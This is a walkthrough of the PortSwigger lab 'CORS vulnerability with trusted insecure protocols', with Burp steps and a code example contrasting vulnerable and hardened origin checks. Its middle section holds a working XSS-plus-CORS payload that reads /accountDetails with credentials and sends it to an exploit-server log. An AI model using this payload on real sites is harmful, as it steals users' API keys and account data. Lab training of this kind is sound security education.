Lab Description Of CORS vulnerability with trusted insecure protocols
In this post we cover the PortSwigger lab "CORS vulnerability with trusted insecure protocols". The lab's website has an insecure CORS configuration that trusts every subdomain without checking the protocol. To solve the lab, we write JavaScript code that extracts the administrator's API key and host it on the exploit server. The provided credentials are "wiener" and "peter".
First, access the lab. After accessing it, open Burp and configure the proxy in your browser. Once you have done that, click on “My Account” and refresh the page.
Now, review the HTTP history. You will see a JSON request to “/accountDetails”. Send that request to the repeater tab in Burp.
Add the “Origin” header as shown below:
Origin: http://subdomain.lab-id
Replace “lab-id” with your lab’s domain.
Final version:
Origin: http://subdomain.0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net
Observe that the origin is reflected in the Access-Control-Allow-Origin header, confirming the presence of a CORS vulnerability.
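As an added example that is not part of the lab or this post, the following Node-style origin check contrasts the suffix-based validation that produces the reflection seen above with an exact allowlist of full origins; it uses the lab hostname from this walkthrough, and TRUSTED_ORIGINS is an assumed allowlist.

```javascript
// Added example (not code from the lab or this post): how the server-side
// origin check decides what the browser is allowed to read cross-origin.
// Lab hostname taken from this walkthrough; TRUSTED_ORIGINS is an assumed allowlist.
const SITE_HOST = '0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net';

function corsHeaders(origin) {
  // Reflecting the origin together with Allow-Credentials lets a page on that
  // origin read authenticated responses such as /accountDetails.
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // keep caches from serving one origin's response to another
  };
}

// Vulnerable check modelled on the lab: any subdomain is trusted and the
// scheme is never looked at, so http://stock.<lab> (where XSS is possible) passes.
function vulnerableAllowOrigin(origin) {
  let url;
  try { url = new URL(origin); } catch (e) { return null; }
  const host = url.hostname; // URL parsing lowercases the host
  if (host === SITE_HOST || host.endsWith('.' + SITE_HOST)) {
    return corsHeaders(origin);
  }
  return null;
}

// Hardened check: an explicit allowlist of full origins (scheme + host + port),
// compared exactly. No suffix matching, no plain-http entries, and every
// listed origin must itself be free of XSS, since it can read credentialed responses.
const TRUSTED_ORIGINS = new Set([
  'https://' + SITE_HOST,
]);

function hardenedAllowOrigin(origin) {
  return TRUSTED_ORIGINS.has(origin) ? corsHeaders(origin) : null;
}

// Constructed Origin values, including the one used in the walkthrough.
const samples = [
  'http://subdomain.' + SITE_HOST,          // the walkthrough's test origin
  'http://stock.' + SITE_HOST,              // the subdomain the exploit runs on
  'https://' + SITE_HOST,                   // the site itself
  'https://' + SITE_HOST + '.evil.example', // suffix-spoofing attempt
];
for (const o of samples) {
  console.log(o, '| vulnerable:', vulnerableAllowOrigin(o) !== null,
              '| hardened:', hardenedAllowOrigin(o) !== null);
}
```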
Now, go back to the lab and view any product. You will see an option to check the stock. Intercept the “check stock” option in Burp Suite.
Inject an XSS payload into the productId parameter. It should execute, confirming that the stock-check subdomain is vulnerable to XSS.
Next, go to the exploit server in the lab and store the script provided below:
<script>
document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
Modify the script by replacing “YOUR-LAB-ID” with your lab’s URL (domain) and “YOUR-EXPLOIT-SERVER-ID” with the URL of your exploit server.
Final version:
<script>
document.location="http://stock.0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a31003c04a44cf380060cc1014e0038.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
Remember, you need to change three things in the code above. In the "document.location" line, replace YOUR-LAB-ID after "stock." with your lab ID (the "stock." subdomain itself stays). In the "req.open" call, replace the lab URL. Lastly, replace the exploit server's URL in the "location=" assignment at the end.
Once you have stored the code on the exploit server and delivered the exploit to the victim, access the logs. You will find the administrator's key there, in encoded form; decode it with Burp Decoder.
The decoded value is the administrator's API key: 7Rdgi0KARqz2GXkaWvspBYozqsoxmOgl.
After submitting the key, you have successfully solved the PortSwigger Web Security lab on CORS vulnerability with trusted insecure protocols.
You can learn everything related to web security on our website. We upload the latest articles on web security topics daily, so stay with us.
Check out the post "CORS Vulnerability With Trusted Null Origin" as well.
FAQs
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up to date, avoid malicious websites and links, always enable two-factor authentication, and stay alert to clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.